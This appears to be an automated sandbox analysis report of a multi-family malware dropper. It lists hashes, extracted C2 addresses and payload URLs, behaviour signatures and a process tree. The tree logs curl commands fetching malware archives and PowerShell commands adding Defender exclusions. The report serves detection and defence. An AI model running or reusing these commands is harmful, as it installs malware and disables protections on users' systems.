Overview

overview

10

Static

static

3

UltraDropper.exe

windows10-ltsc 2021-x64

10

UltraDropper.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    120s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    14-12-2024 11:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    UltraDropper.exe

  • Size

    2.1MB

  • MD5

    214fa35854484aef6af117ca2a1aff67

  • SHA1

    fb728281df40bdd9147ff2ccee66e42d6f96c3c6

  • SHA256

    dbb91096405f222efa0a0733c5690c071b62194476b75793104c8b473dc2c2df

  • SHA512

    4289f8a6820f4b072ba1fff8828bc1bc0988a6bfd3748d2f941fe53ab638bc5a5c2a2e85057db19918a811ce7ab9c73898d083de4892847f9d481253be755ddd

  • SSDEEP

    49152:zW2vZKbn0KJrgcvZ4dvTrRpjgYhNWue0CJAom:dvZKrJ5vZ4drfgYOfK

Score
10/10
dcratemoteteternitynjratprivateloaderraccoonredline@dsadasdasd1epoch5bankerbootkitdiscoveryevasionexecutioninfostealerloaderpersistenceprivilege_escalationratspywarestealertrojanupx

Malware Config

Extracted

Family

eternity

C2

http://eternityms33k74r7iuuxfda4sqsiei3o3lbtr5cpalf6f4skszpruad.onion

Attributes
  • payload_urls

    https://raroford3242.xyz/myupdate.exe

    https://raroford3242.xyz/Sklmsstregens.vbs, https://raroford3242.xyz/remcexecrypt.exe, https://raroford3242.xyz/redlcryp.exe, https://raroford3242.xyz/racoocry.exe

    https://raroford3242.xyz/myupdate.exe

    https://raroford3242.xyz/myupdate.exe

Extracted

Family

emotet

Botnet

Epoch5

C2

178.238.225.252:8080

139.196.72.155:8080

36.67.23.59:443

103.56.149.105:8080

37.44.244.177:8080

85.25.120.45:8080

202.134.4.210:7080

78.47.204.80:443

83.229.80.93:8080

93.104.209.107:8080

80.211.107.116:8080

165.22.254.236:8080

104.244.79.94:443

185.148.169.10:8080

190.145.8.4:443

175.126.176.79:8080

139.59.80.108:8080

188.165.79.151:443

128.199.217.206:443

64.227.55.231:8080
ecs1.plain
eck1.plain

Extracted

Family

redline

Botnet

@dsadasdasd1

C2

45.15.156.155:80

Attributes
  • auth_value

    e2637596f93702084676494f7e0c2dfd

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Dcrat family
    dcrat
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet
  • Emotet family
    emotet
  • Eternity

    Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.

    eternity
  • Eternity family
    eternity
  • Njrat family
    njrat
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

    loaderprivateloader
  • Privateloader family
    privateloader
  • Process spawned unexpected child process 27 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Raccoon is an infostealer written in C++ and first seen in 2019.

    stealerraccoon
  • Raccoon family
    raccoon
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 1 IoCs
  • Redline family
    redline
  • Windows security bypass 2 TTPs 3 IoCs
    evasiontrojan
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • DCRat payload 3 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

    rat
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Disables RegEdit via registry modification 1 IoCs
    evasion
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Drops startup file 2 IoCs
  • Executes dropped EXE 59 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Windows security modification 2 TTPs 3 IoCs
    evasiontrojan
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 21 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 12 IoCs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • Drops file in System32 directory 4 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 13 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
    adwarespyware
  • Modifies Internet Explorer start page 1 TTPs 2 IoCs
    stealer
  • Modifies registry class 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 27 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 58 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
    evasion
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe
    "C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1424
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" "https://github.com/Princekin/malware-database/raw/main/Emotet/Emotet%20(Epoch5)%20-%2004.11.2022%20.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2588
      • C:\Users\Admin\AppData\Local\Temp\ud.curl.exe
        C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" "https://github.com/Princekin/malware-database/raw/main/Emotet/Emotet%20(Epoch5)%20-%2004.11.2022%20.zip" --ssl-no-revoke
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:4548
      • C:\Users\Admin\AppData\Local\Temp\ud.7z.exe
        "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of AdjustPrivilegeToken
        PID:4360
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\AntivirusPro2017.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\AntivirusPro2017.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4868
      • C:\Users\Admin\AppData\Local\Temp\ud.curl.exe
        C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\AntivirusPro2017.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zip" --ssl-no-revoke
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2360
      • C:\Users\Admin\AppData\Local\Temp\ud.7z.exe
        "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\AntivirusPro2017.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:4432
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\AntivirusPlatinum.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\AntivirusPlatinum.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1068
      • C:\Users\Admin\AppData\Local\Temp\ud.curl.exe
        C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\AntivirusPlatinum.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zip" --ssl-no-revoke
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1108
      • C:\Users\Admin\AppData\Local\Temp\ud.7z.exe
        "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\AntivirusPlatinum.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:3716
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\RegistrySmart.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/RegistrySmart.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\RegistrySmart.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4824
      • C:\Users\Admin\AppData\Local\Temp\ud.curl.exe
        C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\RegistrySmart.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/RegistrySmart.zip" --ssl-no-revoke
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:572
      • C:\Users\Admin\AppData\Local\Temp\ud.7z.exe
        "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\RegistrySmart.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:1568
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\socelars.zip" "https://github.com/Princekin/malware-database/raw/main/Socelars%20Trojan/Socelars%20-%2024.09.2022.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\socelars.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4048
      • C:\Users\Admin\AppData\Local\Temp\ud.curl.exe
        C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\socelars.zip" "https://github.com/Princekin/malware-database/raw/main/Socelars%20Trojan/Socelars%20-%2024.09.2022.zip" --ssl-no-revoke
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:4572
      • C:\Users\Admin\AppData\Local\Temp\ud.7z.exe
        "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\socelars.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of AdjustPrivilegeToken
        PID:4132
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\eternity.zip" "https://github.com/Princekin/malware-database/raw/main/Eternity%20Project/Eternity%20Worm%20-%2009.11.2022.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\eternity.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1444
      • C:\Users\Admin\AppData\Local\Temp\ud.curl.exe
        C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\eternity.zip" "https://github.com/Princekin/malware-database/raw/main/Eternity%20Project/Eternity%20Worm%20-%2009.11.2022.zip" --ssl-no-revoke
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1396
      • C:\Users\Admin\AppData\Local\Temp\ud.7z.exe
        "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\eternity.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:788
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\vidar.zip" "https://github.com/Princekin/malware-database/raw/main/Vidar%20Stealer/vidar%20-%2004.11.2022.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\vidar.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:32
      • C:\Users\Admin\AppData\Local\Temp\ud.curl.exe
        C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\vidar.zip" "https://github.com/Princekin/malware-database/raw/main/Vidar%20Stealer/vidar%20-%2004.11.2022.zip" --ssl-no-revoke
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:4396
      • C:\Users\Admin\AppData\Local\Temp\ud.7z.exe
        "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\vidar.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:3200
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\dc.zip" "https://github.com/Princekin/malware-database/raw/main/DcRat/DcRat%20-%2009.10.2022.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\dc.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2980
      • C:\Users\Admin\AppData\Local\Temp\ud.curl.exe
        C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\dc.zip" "https://github.com/Princekin/malware-database/raw/main/DcRat/DcRat%20-%2009.10.2022.zip" --ssl-no-revoke
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2136
      • C:\Users\Admin\AppData\Local\Temp\ud.7z.exe
        "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\dc.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:4700
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\laplas.zip" "https://github.com/Princekin/malware-database/raw/main/Laplas%20Clipper/Laplas%20-%2008.12.2022%20(FUD%203%20of%2071).zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\laplas.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2496
      • C:\Users\Admin\AppData\Local\Temp\ud.curl.exe
        C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\laplas.zip" "https://github.com/Princekin/malware-database/raw/main/Laplas%20Clipper/Laplas%20-%2008.12.2022%20(FUD%203%20of%2071).zip" --ssl-no-revoke
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1692
      • C:\Users\Admin\AppData\Local\Temp\ud.7z.exe
        "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\laplas.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of AdjustPrivilegeToken
        PID:2388
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\njrat.zip" "https://github.com/ytisf/theZoo/raw/master/malware/Binaries/njRAT-v0.6.4/njRAT-v0.6.4.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\njrat.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp\njrat"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2352
      • C:\Users\Admin\AppData\Local\Temp\ud.curl.exe
        C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\njrat.zip" "https://github.com/ytisf/theZoo/raw/master/malware/Binaries/njRAT-v0.6.4/njRAT-v0.6.4.zip" --ssl-no-revoke
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:4356
      • C:\Users\Admin\AppData\Local\Temp\ud.7z.exe
        "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\njrat.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp\njrat"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2308
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\raccoonv2.zip" "https://github.com/ytisf/theZoo/raw/master/malware/Binaries/Raccoon.Stealer.v2/Raccoon.Stealer.v2.sha.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\raccoonv2.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:240
      • C:\Users\Admin\AppData\Local\Temp\ud.curl.exe
        C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\raccoonv2.zip" "https://github.com/ytisf/theZoo/raw/master/malware/Binaries/Raccoon.Stealer.v2/Raccoon.Stealer.v2.sha.zip" --ssl-no-revoke
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1036
      • C:\Users\Admin\AppData\Local\Temp\ud.7z.exe
        "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\raccoonv2.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:1400
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c regsvr32.exe "C:\Users\Admin\AppData\Local\Temp\ultradrp\emotet.dll"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4344
      • C:\Windows\SysWOW64\regsvr32.exe
        regsvr32.exe "C:\Users\Admin\AppData\Local\Temp\ultradrp\emotet.dll"
        3⤵
        • Loads dropped DLL
        PID:4780
        • C:\Windows\system32\regsvr32.exe
          "C:\Users\Admin\AppData\Local\Temp\ultradrp\emotet.dll"
          4⤵
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          PID:3388
          • C:\Windows\system32\regsvr32.exe
            C:\Windows\system32\regsvr32.exe "C:\Windows\system32\LebJLVLGTaYyDzLqK\kvSyiBnEDjBjF.dll"
            5⤵
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            PID:3848
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:980
      • C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]
        C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Enumerates connected drives
        • Writes to the Master Boot Record (MBR)
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of SetWindowsHookEx
        PID:1448
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1556
      • C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]
        C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]
        3⤵
        • Executes dropped EXE
        • Drops file in Windows directory
        PID:2084
        • C:\WINDOWS\302746537.exe
          "C:\WINDOWS\302746537.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:4752
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1E31.tmp\302746537.bat" "
            5⤵
              PID:4760
              • C:\Windows\SysWOW64\regsvr32.exe
                regsvr32 /s c:\windows\comctl32.ocx
                6⤵
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Modifies registry class
                PID:708
              • C:\Windows\SysWOW64\regsvr32.exe
                regsvr32 /s c:\windows\mscomctl.ocx
                6⤵
                • Loads dropped DLL
                • Modifies registry class
                PID:4372
              • \??\c:\windows\antivirus-platinum.exe
                c:\windows\antivirus-platinum.exe
                6⤵
                • Windows security bypass
                • Disables RegEdit via registry modification
                • Executes dropped EXE
                • Loads dropped DLL
                • Windows security modification
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                • Modifies Internet Explorer start page
                • Suspicious use of SetWindowsHookEx
                • System policy modification
                PID:3248
              • C:\Windows\SysWOW64\attrib.exe
                attrib +h c:\windows\antivirus-platinum.exe
                6⤵
                • Drops file in Windows directory
                • Views/modifies file attributes
                PID:3340
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c "C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]"
        2⤵
          PID:1720
          • C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]
            C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2892
            • C:\Users\Admin\AppData\Local\Temp\is-S3AM1.tmp\is-DATM2.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-S3AM1.tmp\is-DATM2.tmp" /SL4 $90100 "C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]" 779923 55808
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2860
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c "C:\Users\Admin\AppData\Local\Temp\ultradrp\Install.exe"
          2⤵
          • System Location Discovery: System Language Discovery
          PID:1676
          • C:\Users\Admin\AppData\Local\Temp\ultradrp\Install.exe
            C:\Users\Admin\AppData\Local\Temp\ultradrp\Install.exe
            3⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3948
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c "C:\Users\Admin\AppData\Local\Temp\ultradrp\Worm (1).exe"
          2⤵
            PID:1004
            • C:\Users\Admin\AppData\Local\Temp\ultradrp\Worm (1).exe
              "C:\Users\Admin\AppData\Local\Temp\ultradrp\Worm (1).exe"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:4920
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c "C:\Users\Admin\AppData\Local\Temp\ultradrp\setup.exe"
            2⤵
            • System Location Discovery: System Language Discovery
            PID:1928
            • C:\Users\Admin\AppData\Local\Temp\ultradrp\setup.exe
              C:\Users\Admin\AppData\Local\Temp\ultradrp\setup.exe
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:780
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c "C:\Users\Admin\AppData\Local\Temp\ultradrp\Genshin Impact.exe"
            2⤵
            • System Location Discovery: System Language Discovery
            PID:1372
            • C:\Users\Admin\AppData\Local\Temp\ultradrp\Genshin Impact.exe
              "C:\Users\Admin\AppData\Local\Temp\ultradrp\Genshin Impact.exe"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:840
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\winsessionnet\qmazbV2JlRldI.vbe"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:2736
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\winsessionnet\kudjk2JZBqNfIbV0H.bat" "
                  5⤵
                    PID:3184
                    • C:\winsessionnet\PortwebSaves.exe
                      "C:\winsessionnet\PortwebSaves.exe"
                      6⤵
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      • Drops file in Windows directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:676
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winsessionnet\PortwebSaves.exe'
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3032
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Pictures\cmd.exe'
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1892
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\AccountPictures\sppsvc.exe'
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4388
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\conhost.exe'
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1980
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\Java\dllhost.exe'
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious use of AdjustPrivilegeToken
                        PID:952
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
